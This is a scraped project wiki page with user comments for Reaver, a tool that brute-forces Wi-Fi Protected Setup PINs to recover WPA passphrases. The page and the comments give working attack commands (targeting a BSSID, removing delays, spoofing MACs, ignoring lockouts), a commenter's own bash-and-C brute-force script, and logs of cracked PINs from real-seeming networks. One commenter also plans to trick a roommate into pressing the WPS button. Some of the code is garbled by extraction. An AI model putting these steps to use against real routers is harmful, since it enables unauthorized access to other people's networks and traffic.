My favorites ?

| Sign in Logo reaver-wps Brute force attack against Wifi Protected Setup Project Home Downloads Wiki Issues Source Search for HintsAndTips Hints and tips on using Reaver Updated Jan 17, 2012 by cheff...@tacnetsol.com Prerequisites You must be running Linux You must have a wireless card capable of raw injection You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite. Basic Usage First, make sure your wireless card is in monitor mode: # airmon-ng start wlan0 To run Reaver, you must specify the BSSID of the target AP and the name of the m onitor mode interface (usually 'mon0', not 'wlan0', although this will vary base d on your wireless card/drivers): # reaver -i mon0 -b 00:01:02:03:04:05 You will probably also want to use -vv to get verbose info about Reaver's progre ss: # reaver -i mon0 -b 00:01:02:03:04:05 -vv Speeding Up the Attack By default, Reaver has a 1 second delay between pin attempts. You can disable th is delay by adding '-d 0' on the command line, but some APs may not like it: # reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0 Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small diffie-hellman secret numbers in order to reduce the computa tional load on the target AP: # reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small MAC Spoofing In some cases you may want/need to spoof your MAC address. Reaver supports MAC s poofing with the --mac option, but you must ensure that you have spoofed your MA C correctly in order for it to work. Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's phy sical interface. For example:

# # # # #

ifconfig wlan0 down ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69 ifconfig wlan0 up airmon-ng start wlan0 reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69

Default Pins It has been reported that some models/vendors/ISPs all come configured with a de fault pin. Common pins are 12345670, 00005678, 01230000, etc. Reaver attempts kn own default pins first. Errors and Warnings It is not uncommon to get a few errors or warnings during the attack, usually re lated to receive timeouts or out of order WPS messages. You may even get these w arnings for a few minutes until the pin count starts incrementing again. However, if your pin count does not increment at all, or increments only occasio nally with lots of errors/warnings, answer the following: Does the target AP support WPS and is WPS enabled? Did you put your wireless card into monitor mode? Did you specify the monitor mode interface with the -i option? Do you have a good signal from the AP? If you still have problems, you can see if your problem is already listed in the project issue tracker. If not, create a new issue, and be sure to include: Linux distro, distro version, and architecture (32 bit or 64bit?) Wireless card and driver Pcap file demonstrating the issue, if possible Comment by basti.me...@gmail.com, Dec 30, 2011 Could you list the instructions for capturing the entire process with pcap here as well? Thanks in advance :-) Comment by project member peac...@tacnetsol.com, Dec 30, 2011 tcpdump -i mon0 Comment by yougotpw...@gmail.com, Dec 31, 2011 Can you add a list of vulnerable Access Points? Comment by yougotpw...@gmail.com, Dec 31, 2011 A good start is following List from http://www.kb.cert.org/vuls/id/723755: Vendor Status AVM (Brute-Force Timeout Protection) Belkin, Inc. Affected Buffalo Inc Affected D-Link Systems, Inc. Affected Linksys (A division of Cisco Systems ) Affected Netgear, Inc. Affected Technicolor Affected TP-Link Affected ZyXEL Af fected I added AVM FritzBox?! which prevents the attack by locking wps after a few atte mpts Comment by ikehi...@gmail.com, Dec 31, 2011 Im a complete noob. Just downloaded Vmware a Ubuntu for the first time yesterday . Install went well. Downloaded BT5 to access WEP. Worked well. Just downloaded Reaver and I have no idea where to start. How do I implement Reaver? Comment by ikehi...@gmail.com, Dec 31, 2011

Also I am using a ALFA awus036h wireless card with rtl8187 driver. Comment by entner....@gmail.com, Jan 2, 2012 Is it possible to test only one key to see if it works? Comment by entept...@gmail.com, Jan 2, 2012 yep use --pin 1234567890 Comment by lhstrump...@gmail.com, Jan 4, 2012 Your prereq's say run Linux, but does OS X 10.7 qualify since it's basically uni x, right? If not, what flavor of linux do you recommend? Comment by patricks...@gmail.com, Jan 5, 2012 Maybee you should take a look into the folder /etc/reaver/ and open a file "macn umber.wpc" and you will see some awnser there. Comment by omnivor...@hotmail.com, Jan 6, 2012 Has anyone looked into if the -L argument, the ignore lock down argument, actual ly is usefull? I have tried this on two different APs without any success. It tr ies out all the combinations (first half) of the pin and when it reaches the las t pin combination it just keeps repeating that last one. What im wondering is, w hen the AP is in "lock mode", does it accept the pins / the M4 packet we are sen ding? Im starting to wonder that they by default send NACKs whenever they are in "lock mode" even though i at some point during a "lock mode" am sending a valid pin. Not confirmed, only a guess. Has anyone looked into this any further or mi ght have any idea regarding this? Comment by EsperHa...@gmail.com, Jan 6, 2012 Reporting success in retrieving WPA2 TKIP/AES PSK Key from a TP-LINK AP using WP S Reaver ... However I was in a hurry in the morning so I forgot to check how mu ch it took me to retrieve the pin. I don't know if reaver stores log files somew here .. but I can't seem to find them. Regards. Sorry I can't reveal the model number of the AP, just it is TP-LinK __ ..... WPS Reaver team R0ckZ Comment by EsperHa...@gmail.com, Jan 6, 2012 @ obrei Reaver v1.3 is out ... try it and report !! I have an AWUS036H it is wor king with backtrack5 like a charm. be sure to use airmon-ng start wlan0 first. Comment by obrei...@gmail.com, Jan 6, 2012 Well, at least starting the tool succeeded: the problem was 'SUDO' :))) - so tip to all newbies like me - always type "sudo" to get root privilegs! Cheers:))! Comment by obrei...@gmail.com, Jan 8, 2012 Hi again, want to report an odd sitiation here. PIN was cracked but no PSK was d isplayed: +] 97.46% complete @ 2012-01-07 17:52:58 (2 seconds/attempt) [+] 97.51% complete @ 2012-01-07 17:53:08 (2 seconds/attempt) [+] 97.55% complete @ 2012-01-07 17:53:18 (2 seconds/attempt) [+] 97.60% complete @ 2012-01-07 17:53:28 (2 seconds/attempt) [+] 97.65% complete @ 2012-01-07 17:53:39 (2 seconds/attempt) [+] 97.69% complete @ 2012-01-07 17:53:49 (2 seconds/attempt) [+] WPS PIN: '33797793'

[+] AP SSID: 'NET_12' Any help and ideas why?? Thanks! Comment by qpe...@gmail.com, Jan 8, 2012 Reaver v1.3 WiFi? Protected Setup Attack Tool Copyright (c) 2011, Tactical Netwo rk Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Waiting for beacon from 1C:BD:B9:8C:FF:48 [+] Switching mon0 to channel 1 [+ ] Associated with 1C:BD:B9:8C:FF:48 (ESSID: TALKTALK-8CFF48) [+] Trying pin 7535 3643 [!] WARNING: Receive timeout occurred [+] Trying pin 75353643 [!] WARNING: Failed to associate with 1C:BD:B9:8C:FF:48 (ESSID: TALKTALK-8CFF48) [!] WARNING: Receive timeout occurred [+] Trying pin 75353643 [+] Key cracked in 113 seconds [+] WPS PIN: '75353643' [+] Nothing done, nothing to save. is it a bug or I'm doing something wrong? Comment by grayoa...@gmail.com, Jan 8, 2012 Poor connection strength, use sudo-aireplay-ng -9 wlan0 to check the strength. Y ou want to at the very least be in the 50's, preferrably the 40's or below On Jan 8, 2012, at 6:07 PM, "reaver-wps@googlecode.com" <reaver-wps@googlecode.c om> wrote: Comment by qpe...@gmail.com, Jan 9, 2012 1C:BD:B9:8C:FF:48 -56 27 0 0 1 54e WPA2 CCMP PSK TALKTALK-8CFF48 It's not poor connection i cracked one password on over 80's Comment by adam.rzo...@baruchmail.cuny.edu, Jan 11, 2012 little question (since im a total linux noob): how do I update reaver to the new est current revision (exact commands appreciated)? Google and looking everywhere on this page have yielded no results. Comment by ObiDanKi...@gmail.com, Jan 12, 2012 Yo ad, what i did was theese. The dude whos program it is mentioned a 1.4 update fairly soon, but if you reall y can't wait.... Download Reaver 1.3. Then go to the revisions page, you can reach it by going to http://code.google.com/p/reaver-wps/source/browse/ Clicking on trunk, then src. O.k that was the easy bit. Now click on the top file on the right hand side 80211.c. Scroll down by file in fo and click "view raw-file" In firefox "file...then.. Save page as. Keep the name the same. Do the same for all 43 odd files. Once you have all the files grouped create a directory on your desktop called sr c. Then delete the src folder from inside your reaver1.3 directory and replace i t with the src you've just created/downloaded.

O.k almost done.... Now back to the googlecodepage and underneath the src folder on the left should be common,crypto e.t.c Go in each of these folders and look for any newer revisi ons than r3.....if you see for example r62 or whatever, then do the same old vie w raw...save page as....and replace that single file with the one in your reaper 1.3 directory... Once you've updated all the files your almost done but not quite. You need to then change a few of the files to executable. Use the chmod ugo+x "filename" to accomplish this. And then just ./configure, make and make install... Easy.....(?) ;) Or wait for the next release haha ;) Comment by patricks...@gmail.com, Jan 12, 2012 May be if we ask cheff gently, he would put reaver 1.4 with those revisions for download.... :-) Comment by ObiDanKi...@gmail.com, Jan 12, 2012 Haha might be a good call dude ;). I'm still struggling to get any results with reaver. I've been getting somewhere with wpa_supplicant though, getting some legitimate eapol transactions happenin g. The whole beacon frame/associate thing wasn't happening with reaver on this syst em. Basically reaver would say associated using the -A switch and using aireplay to associate, it would say trying pin, but no eapol packet transaction happened . It just timed-out. So far in my <owboi <od3r experiments it would seem that given a few tweakages, wpa_supplicant has single handedly been able to scan for ap's, associate properl y with them, and then start the eapol transaction that has been talked about wit h all the people who have reaver functioning normally (grinds teeth not like im jealous or anything hahahaahah ;). I guess that was its whole purpose in the fir st place, it begs the question why so many tweaks were needed to get it there th ough ;). Maybe my system is just not up to scratch =P. Anyways so i have the eapol transactions going now, they go as such... Eapol start, request identity,response identity, request expanded type, response expanded type, failure. I'm taking it from other peoples posts this is the way reaver should operate? Any hints from those who've got it working, would be cool! Cheers - dan Comment by grayoa...@gmail.com, Jan 12, 2012

What is the wireless card you're using? And you've verified that injection is wo rking after putting it into monitor mode? (sudo airmon-ng start wlan0) Comment by mkpi...@gmail.com, Jan 12, 2012 How do you verify injection is working? Comment by marcodem...@gmail.com, Jan 12, 2012 good question i get timeouts all the time at all accesspoints with different sig nal strengths horribly instable sometimes even association failed. I dont buy it that signal is too weak, more likely the driver. Would be nice to get more info in a future version timeout (reason: ...) o well great tool anyway gj guys i ho pe ill get it working one day Comment by grayoa...@gmail.com, Jan 12, 2012 assuming you have the necessary airhack-ng package installed enable monitor mode first (sudo airmon-ng start wlan0) then to verify injection is working use (sudo aireplay-ng -9 wlan0) Comment by MoHaMeDW...@gmail.com, Jan 12, 2012 i am using backtrack 5 with ALFA AWUS036H and it work fine when cracking wep.... .but having a problem get reaver work here is what do ./walsh -i mon1 Scanning for supported APs... B8:A3:86:3F:0C:92 WeWe? 00:24:17:9 5:55:85 EL-safa7 hit cntrol+cto stop scanning and typing ./reaver -i mon1 -b B8: A3:86:3F:0C:92 -vv -c 11 Waiting for beacon from B8:A3:86:3F:0C:92 Switching mon1 to channel 11 [+] Assoc iated with B8:A3:86:3F:0C:92 (ESSID: WeWe?) [!] WARNING: Failed to associate wit h B8:A3:86:3F:0C:92 (ESSID: WeWe?) [+] Associated with B8:A3:86:3F:0C:92 (ESSID: WeWe?) [+] Trying pin 15772251 [!] WARNING: Last message not processed properly , reverting state to previous message so i verifying injection 03:29:04 Trying broadcast probe requests... 03:29:04 Injection is working! 03:29 :06 Found 1 APs 03:29:07 B8:A3:86:3F:0C:92 - channel: 11 - 'Andrew Fam' 03:29:08 Ping (min/avg/m ax): 9.083ms/47.347ms/73.673ms Power: -59.37 03:29:08 30/30: 100% and tried to Authenticate with this AP aireplay-ng -1 0 -a B8:A3:86:3F:0C:92 mon1 No source MAC (-h) specified. Using the device MAC (00:C0:CA:45:29:A0) 03:32:01 Waiting for beacon frame (BSSID: B8:A3:86:3F:0C:92) on channel 11 03:32:01 Sending Authentication Request (Open System) ACK? 03:32:01 Authenticati on successful 03:32:01 Sending Association Request ACK? 03:32:01 Association suc cessful :-) (AID: 1) that what happens with both AP waht i do now? note: no clients in both APs Comment by adam.rzo...@baruchmail.cuny.edu, Jan 15, 2012 obidan~ i have no fucking clue what the fuck you wrote

Comment by ObiDanKi...@gmail.com, Jan 16, 2012 Might be best to wait for the next official release then sunshine. ;) Comment by qpe...@gmail.com, Jan 18, 2012 Hi is there any easy way to get reaver 1.4 beta without downloading file by file from trunk? Comment by patricks...@gmail.com, Jan 18, 2012 @qpe http://code.google.com/p/reaver-wps/issues/detail?id=140#c6 Comment by costell...@gmail.com, Jan 18, 2012 any tutorial on walsh?to scan AP's and see who is having WPS On Comment by patricks...@gmail.com, Jan 18, 2012 @costell put your card in monitor mode with airmon-ng walsh -i mon0 -C -s or wash -i mon0 -C -s Comment by costell...@gmail.com, Jan 18, 2012 Thx now i see i need to install walsh too Comment by patricks...@gmail.com, Jan 18, 2012 walsh and wash are the same. The name has been changed from one revision to anot her. Comment by costell...@gmail.com, Jan 18, 2012 it's saying command not found i have installed reaver 1.3 Comment by patricks...@gmail.com, Jan 18, 2012 @costell http://code.google.com/p/reaver-wps/issues/detail?id=140#c6 Comment by patricks...@gmail.com, Jan 18, 2012 go into the directory where you downloaded reaver then into src make cleanall or make distclean ./configure make make install Comment by costell...@gmail.com, Jan 18, 2012 any ideea where to find it? i installed reaver like this apt-get update apt-get install reaver Comment by patricks...@gmail.com, Jan 18, 2012 @costell.... do you know "google" ? well try this one (found on google) sudo apt-get remove paket_name Comment by patricks...@gmail.com, Jan 18, 2012 @ costell and after this remove you reinstall it with the svn like above. Comment by Chrifis...@gmail.com, Jan 18, 2012 Tried Reaver 1.3 (ath9k) against my DIR-655 rev.A2 (1.35NA Firmware). I can say that both Reaver and the AP's WPS is buggy. Last night I could run Reaver at ful l speed and it would get receive timeouts around the 12th pin or so. Today I can run full speed for 24 pins once and 60 pins later. Last night I was toying arou nd with the -d and -r options. I had -d 4 -r 12:20 and it starting timing out ar ound the sixth cycle. Cycle being 12 pins then 20 second sleep. Tried -d 4 -r 12

:30 and same thing. Tried -d 5 -r 10:30 and same thing. Today I tried -d 5 -r 10 :60 and it made it a little further but same thing. [+] 18.05% complete @ 2012-01-18 15:56:55 (2 seconds/attempt) [+] Trying pin 576 89661 [+] Trying pin 12519668 <---- Notice the duplicates? [+] Trying pin 125196 68 <----- [+] Trying pin 78419667 [+] Trying pin 60579669 <---- Again [+] 18.07% complete @ 2012-01-18 15:57:03 (2 seconds/attempt) [+] Trying pin 60579669 <---- [+] Trying pin 24479660 [+] Trying pin 95259666 <---- Again [+] Trying pin 95 259666 <---- [+] Trying pin 04929666 [+] 18.11% complete @ 2012-01-18 15:57:11 ( 2 seconds/attempt) [+] Trying pin 80589662 [+] Trying pin 80589662 [+] Trying pi n 80589662 [!] WARNING: Receive timeout occurred [+] Trying pin 80589662 [!] WAR NING: Receive timeout occurred [!] WARNING: Receive timeout occurred Receive timeout repeats for a while until Reaver freezes. Quit Reaver and try ag ain and it works fine. Works perfectly as long as I keep restarting every time i t starts getting receive timeouts. I'm trying to track the issue so I have Wireshark open and am watching the EAP c onversations. I've noticed that Reaver sends duplicate packets all the time when the router only sends one. Router >>>>>>> Computer --Request, WPS, M1 Computer >>>>>> Router --Response, WP S M2 Computer >>>>>> Router --Response, WPS, M2 Router >>>>>>> Computer --Reques t, WPS, M3 Computer >>>>>> Router --Response, WPS M4 Computer >>>>>> Router --Re sponse, WPS, M4 etc..... When it starts to get the receive timeout error this is what shows up in Wiresha rk: Computer >>>>>>> Router --Start Router >>>>>>>>> Computer --Request, Identity (D uplicate 2) Computer >>>>>>>> Router --Response, Identity (Duplicate 3) Router > >>>>>>> Computer --Failure Computer >>>>>>> Router --Failure Computer >>>>>>>> R outer --Response, Identity (Where did this come from?) Computer >>>>>>> Router -Failure Then a little later it tries the Start packet again and sometimes request AND re sponse for identity and that's it. There's a lot of association going on back an d forth. I have to quit Reaver and restart and everything works fine again. I do n't think the AP is getting bogged down, I think there's an issue with Reaver or something on my end. The AP loses all internet connectivity if I try even one P IN lol Takes like 30 seconds after I stop before the normal operation is restore d. I just updated to Reaver 1.4 and will run some tests tonight. Comment by patricks...@gmail.com, Jan 19, 2012 @ Craig, I made also tests with another computer with Kubuntu on it with all my different wireless adapters on those AP's where i got entered with the computer with Backtrack on it. So i see those errors like time out, or unable to connect, 0x2, 0x3 after 2 minute i stop those tests because it make no sense, i know you r program is running right (allmost 90% of it) I also tried with those compat dr ivers and patches without success. I know also these connection problems with this wicd, what have nothing to do wi th reaver but this thing does not what it should and i have not found a bullet p roof solution for it to get it work. Well i just took a look on Aircrack and it seems to me that they made their own patches for many different chipsets.

I am not sure with my analysis it's my feedback, and might be an idea to solve s ome issues, for me not every error message equals a bug well i have a big respect from your programming work. What IDE are you using? Comment by qpe...@gmail.com, Jan 21, 2012 I have ubuntu 11.10 with kernel 3 does someone have wifi patch to make mon0 for reaver test Comment by gabethui...@yahoo.com, Jan 24, 2012 ok I run bt 5 with atheros AR9285 wireless card. I tested the connection strengh t with command airplay-ng -9 wlan0 and the results are: 00:55:15 Trying broadcast probe requests... 00:55:15 Injecgion is working! 00:55 :17 Found 1 AP 00:55:15 Trying directed probe requests... 00:55:17 08:76:00:xx:xx:xx - channel: 10 - 'TISCALI1234' 00:55:18 Ping (min/avg/max): 2.989ms/14.891ms/26.811ms Power: -81.93 00:55:18 30/30: 100% then when I run ./walsh -i mon0 -C -s, I have this results: Scanning for support ed APs... 00:24:89:xx:xx:xx Vodafone-43270098, and nothing more. so what results of the command should I believe? walsh or airplay-ng -9 wlan0? in the end I tryied ./reaver -i mon0 -b 08:76:FF:xx:xx:xx -vv, with no success [+] Waiting for beaco from 08:76:FF:xx:xx:xx [+] Switching mon0 to channel 10 [+ ] Associated with 08:76:FF:xx:xx:xx (ESSID: TISCALI1234) and no response. in the end I used to crack tiscali because vodafone gives me re quest timed out and it is trying the same pin how can I make it work? Comment by saeed.y2...@gmail.com, Jan 26, 2012 It may help to find How To Install reaver easily http://www.theprojectxblog.net/ apt-get-install-reaver-for-backtrack-and-backbox-linux/ Comment by qpe...@gmail.com, Jan 29, 2012 How to make cap file for Reaver guys to check? Comment by lawrence...@gmail.com, Feb 6, 2012 Here's something neat I found. I'm trying to crack my roommate's old router, jus t for the fun of it. He's set it up in his bedroom as a challenge, I do not have physical access to it, all he's given me is the name, so I'm not trying to brea k into a neighbor's router. He turned pale when I told him it was a Netgear (C0: 3F:0E....), so as you can guess, he's pretty easy to scare. Reaver is stuck at 99.99% complete, and is trying the same PIN over and over for hours, getting constant "Receive timeout occurred" messages. When I browse through the session file (/usr/local/reaver/C03F0E...wpc according to docs, but actually appeared in /etc/reaver/C03F0E...wpc on my system) I see a little more than 90% of the file is 4 digits long, and the rest is 3 digits lo ng. And I show:

# cat C03F0E...wps | sort | less Gives me a neat list of the numbers 0-1000, with some duplication due to sort or ders. Interestingly, there's a 1 at the top of the list. It's not 001, or 0001, it's just 1. # cat C03F0E...wps | sort | wc 11003 lines. # cat C03F0E...wps | sort | uniq | wc 11001 lines. And one line was a 1. Not 001 or 0001. I'm guessing the solitary 1 was a placeholder for some successful reply back from the router, since it appea rs early in the file, I'm guessing it was a placeholder for a salted four digit number which gave a successful output. So I have 11,003 separate attempts, two lines being discarded as two separate ha lves (identical), ignoring one line as a lone 1 (WPS PIN is 4 digits then 3 digi ts then a check digit), and the router starts giving me receive timeouts at 99.9 9% through. I didn't do so well at Probability in Statistics in Engineering school, and my p rogramming style is so much brute force and ignorance that I once got a job offe r from Microsoft. I'm good at analog electronics, small signal to big power. Why did it take that long? We have 104 on the first, so 0000-9999. We have 103 on the second portion of the PIN, so 000-999. 11,000 possibilities, each portion of the PIN independently ve rified, ignoring the check digit which is basically a joke. I expect that once R eaver knows the correct first 4 digits, or the correct last 3 digits, it keeps o n sending "random" digits for that already-known portion until it gets confirmat ion for the second part of the PIN, and then just gives both known correct porti ons at once to get in. (Why try the known PIN portions over and over? It would b e obvious in log files.) Statistically, we have a 50% chance of catching the first 4 digits within the fi rst 5000 tests. Statistically, we have a 50% chance of catching the last 3 digit s withing the first 500 tests. 50% chance out of 11,000 tests. 5500 tests should get 50% penetration. Since we're doing both concurrently and calculating a check digit for each one, we should be finding the last three digits pretty quickly, since they're a seque nce of numbers being repeated 2.5 times in the time it takes us to get to 50% th rough the 4 digit portion. By my logic, Reaver finds the first three digits befo re it even gets halfway through the 4 digit portion. Without remembering the mat h to calculate the odds, we should find the whole thing half the time in about 4 500 tries is my educated guess, but as I've said, I didn't do really well in Pro bability and Statistics ("D stands for Degree!"). I'm guessing the PIN # that Reaver is stuck at is the PIN number, and the router needs a button press (software or hardware) to allow short-term PIN access, and it's ignoring me until I press the button. Either that, or reaver exhausted eve rything and just doesn't give up gracefully? Am I on the right track, before I admit a measure of defeat and ask my roommate to press the button during a Reaver session?

Before I set up a cron job to try this WPS pin Reaver stopped at and ask him to press the button at some random time when I'm not home (as if he was associating a friend's iPhone or something)... Thanks again for Reaver. My roommate isn't complaining about his high Internet b ills now that I've shown that I can get into his D-Link in a few hours - actuall y, the D-Link only took about 2 hours. :) Comment by jb...@godswind.org, Feb 11, 2012 I tried out reaver 1.4 on my gateway cable modem (reaver -i mon0 -b XX:XX:XX:XX: XX:XX -vv). It took a couple of hours (low PIN), and then spit out all the info. So I decided to try a few options, and played with changes to my Wi-Fi setup an d using different USB air cards. (I'm using BT5r1 in VMware.) At some point, I d iscovered that I was unable to associate with my AP. If it's not to late, I'll m ake a long story short... Reaver will only associate with my AP if ESSID broadcasting is enabled. If there is a workaround, it would be nice to find it the FAQ & wiki. Thanks so much for a great tool. Comment by ObiDanKi...@gmail.com, Feb 12, 2012 Yo lawrence. Heres a workaround i've worked on for a little bit. ;) (ubuntu 10.0 4) Not being a big-head mcgee but this is fairly advanced, if your new to linux, an d unless your feeling brave, best not to attempt this, else ya might mess ya shi zniz up. The way the wps breach works as i found out fairly recently, is that you send a full 8 digit wps-pin at all times. 7 Digits + checksum. Sending 4-digits only wi ll not return the anticipated M5 message that we so fondly wish to caress loving ly. You can test this manually by doing the following. Install wpa_supplicant if it isn't allready installed. Disable Network Manager autorespawn with "sudo gedit /etc/init/network-manager.c onf" Hash out (#) Respawn. You then need to sudo gedit the /etc/wpa_supplicant.conf file with the following ctrl_interface=DIR=/var/run/wpa_supplicant GROUP="your user name" update_config=1 After doing this running the following script should bring down the Network Mana ger and wpa_supplicant respectively. Here is a script i wrote au manuel. Nano and chmod u+x that shit. WARNING!! THIS IS SYSTEM SPECIFIC!!.# What we are trying to do with this script is kill networ k manager and wpa_supplicant and "reload" wpa_sup with the desired command line switches. "#! /bin/bash

sudo kill -9 $(ps -A | grep Network | awk '{print $1}') && sleep 1 sudo kill -9 $(ps -A | grep wpa | awk '{print $1}') && sleep 1 echo 'Killing Network Manager & Wpa Supplicant' && sleep 1 echo "Done" sudo ifconfig wlan0 up && sleep 1 sudo wpa_supplicant -Dwext -i wlan0 -c/etc/wpa_supplicant.conf -B echo 'Bringing up Wpa Supplicant in interactive mode' && sleep 1 echo 'Done' exit 0" After that you should be able to simply type wpa_cli and bring up wpa_cli in int eractive mode. From there the way forward is wps_reg "BSSID" "8Dig pin" (00000000 is a good tes t subject ;) Having a running copy of wireshark or at the very least tcpdump is probably a fa irly good idea! ;) (and by fairly i mean vitally ;) Have a brief scopage at this . You are looking for eapol M-messages. If it pings back up to M4, your ready to rock. Consult reaver documentation for how the process works, but if you do it au manu el your going to need an ean-8 calculator, because technically speaking the firs t 7 digits is the pin and the 8th is a checksum. For example...pin 1234567 (0) = 12345670 2345234 (3) = 23452343 You can find these online. But they are essential to the wps_pin cracking method ology. The following script i wrote (with assistance and kudos to assister! You know wh o ya are! ;) automates the process. Please bear in mind though this is very bazik shit here, theres no error checkin g that sorta thing. Hey i'm just lurning programming give me a brake! #!/bin/bash for i in {0..9999}; do code=$(printf "%04d"000 $i) ans=$(ean8 $code) echo $(date +%H:%M:%S) echo $(date +%H:%M:%S) >> /home/User/log.txt echo 'wpa_cli wps_reg BSSID ' $ans echo 'wpa_cli wps_reg BSSID' $ans >> /home/User/log.txt wpa_cli wps_reg B SSID $ans >> /dev/null #Optional redirect to /dev/null sleep 9

done Changing "sleep" gives a delay between pin attempts. I've heard this can be a go od thing in the world of slowly responding ap's. Right about now my little funk soul brothers/sisters you are probably thinking w ell where is the ean8 program that is called from within this little script....s kadoosh! nano it, save it as ean8.c, compile it, and stick it in the /bin where it can be easily found! ;) Note all credit to an awesome senior for this little module! #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char argv) { int i, odd_sum = 0, even_sum = 0, sum, check_digit; // to install 'make ean8 ' or 'gcc -o ean8 ean8.c' char base; // then move exe to /bin path. if (argc != 2) { fprintf(stderr, "Error: Wrong number of arguments\n"); exit(EXIT_FAILURE ); } base = argv1?; if (strlen(base) != 7) { fprintf(stderr, "Error: Argument is not 7 characters\n"); exit(EXIT_FAIL URE); } for (i = 0; i < 7; i += 2) { // Odd digits odd_sum += basei? - '0'; } for (i = 1; i < 7; i += 2) { // Even digits even_sum += basei? - '0'; } sum = odd_sum 3 + even_sum; check_digit = (10 - (sum % 10)) % 10; printf("%s %d\n", base, check_digit); return(EXIT_SUCCESS); } O.k a couple more tweaks and your almost all set...easy peasy...right? ;) In wireshark set the time setting to "standard time" (i.e not packets), then hou rs,minutes,seconds.

O.k good job. Tweak the wps.sh (main shell file) to include the variables you ne ed. (bssid and path for log). Set wireshark recording, execute the wps.sh file, it should spit back the time, the command line wps_reg et.c and the pin being tried in the terminal its runnin g in. This is groovy. Check wireshark and make sure your getting constant M4 messages (i.e your sleep variable isnt set too low, 9 seems reasonable). After either the program ends (long flipping time) or you terminate the program because you got tired of waiting.Yawn =P Stop wireshark. Export the data to a lo g file. Then just run the command more log.txt | grep M5 > Ihadadogandhisnamewasbingo.tx t. Cross correlate this with the time in your other log file, and well done you' ve successfully just cracked the first four digits on the wps_pin. (Note Its pro bably better to change the for loop from 0..9999 to something smaller like 0..10 00 and attempt pins in smaller sections. Its a semi-automatic method, granted, but i'm thinking it wouldn't be too hard t o automate the rest of the process, perhaps in the open source spirit of things someone else can add to/improve this workaround.(I was just thinking of automati ng the logging and grepping section) And its not a diss to the work of the reaver guys either, its just me trying to find an alternate way of accomplishing the same ends! (As i couldn't get reaver working ;)! "Freely we receive the knowledge, so freely we share it == the open sauce way?" In the immortal words of the base radio operator in the quality snes classic 'st arwing' Gooooooood luck! And queue awesome snes music. - 3nd P.s Secure your networks & disable wps if you value your privacy! Comment by ObiDanKi...@gmail.com, Feb 12, 2012 P.p.s code lines are somewhat messed up, you might need to give them a bit of st ructure! If you manage to get this workaround working a) Halleleuiah b) well done. Then a tiny bit of modification to the wps.sh scripts first couple of lines will provide a means to test the second half of the pin as well. The further plans to mod this script were to log in 1%ages {0..100} then execute the log dumping from wireshark/tcpdump, grepping for M5 messages & then cross c orrelating this with the other logfile generated by the wps.sh script. After ret urning a negative result continuing with the next batch of pins {101..200} and s o on and so forth until a positive result is achieved. The whole thing is very zen/simple but its a workaround none the less, for those not achieving desired results.

Comment by ObiDanKi...@gmail.com, Feb 12, 2012 P.s to slightly unconfuse things (hopefully) the first script the one that kills network manager e.t.c i called net.sh =P If you want to do the kill process manually just do a ps -A and look for the pid of network manager and wpa_supplicant and enter a kill -9 command. Comment by demon.ia...@hotmail.com, Feb 13, 2012 graphics environments: WPSCrackGUI v1.0.6 = https://sourceforge.net/projects/wpscrackgui/ Inflator v1.0 = http://blog.ibeini.com/archives/597.html for Ubuntu and Beini. Comment by ashag...@gmail.com, May 4, 2012 i'm trying reaver 1.4 but till now nothing happned XD i'm using BT5 R2 in Vmware using Intex Cosmos wireless card Interface Chipset Driver wlan2 Realtek RTL8187BvB(early) rtl8187 - phy0? mon0 Realtek RTL8187BvB(early) r tl8187 - phy0? root@bt:~# aireplay-ng -9 mon0 01:04:56 Trying broadcast probe requests... 01:04 :56 Injection is working! 01:04:58 Found 8 APs 01:05:10 B4:82:FE:0D:E1:D7 - channel: 1 - 'PAPILLON' 01:05:10 Ping (min/avg/max) : 1.969ms/6.104ms/13.109ms Power: -33.23 01:05:10 30/30: 100% root@bt:~# reaver -i mon0 -b B4:82:FE:0D:E1:D7 -c 1 --v Reaver v1.4 WiFi? Protected Setup Attack Tool Copyright (c) 2011, Tactical Netwo rk Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Waiting for beacon from B4:82:FE:0D:E1:D7 [!] WARNING: Failed to associate w ith B4:82:FE:0D:E1:D7 (ESSID: PAPILLON) [!] WARNING: Failed to associate with B4 :82:FE:0D:E1:D7 (ESSID: PAPILLON) [!] WARNING: Failed to associate with B4:82:FE :0D:E1:D7 (ESSID: PAPILLON) so why he failed to associate ? ^^ Comment by Biohunte...@gmail.com, May 15, 2012 Is it possible to "tell" Reaver a specific PIN to use? Im in a situation where I have the WPS pin, but not the WPA2 key..... Comment by shkurko....@gmail.com, May 17, 2012 Use --pin 12345670 Comment by pa.bil...@gmail.com, May 20, 2012 Hi guys, some pb ! When i launch reaver -i mon0 ... it switches to the good channel then lit associats but nothing else!when I ctrl-c it ends with anything saved :( some ideas ? Thx Comment by devera.m...@gmail.com, Jun 1, 2012 I already have the wps pin and psk. How can I use this to login to the wifi netw ork? If I use these as passwords, I can't be connected. Please guide me with thi s. Comment by IslandDi...@gmail.com, Jun 13, 2012

How do I import saved WPS pins from one Linux machine to another? I found the re aver file but cant seem to find the saved files for it. ? Sign in to add a comment Terms - Privacy - Project Hosting Help Powered by Google Project Hosting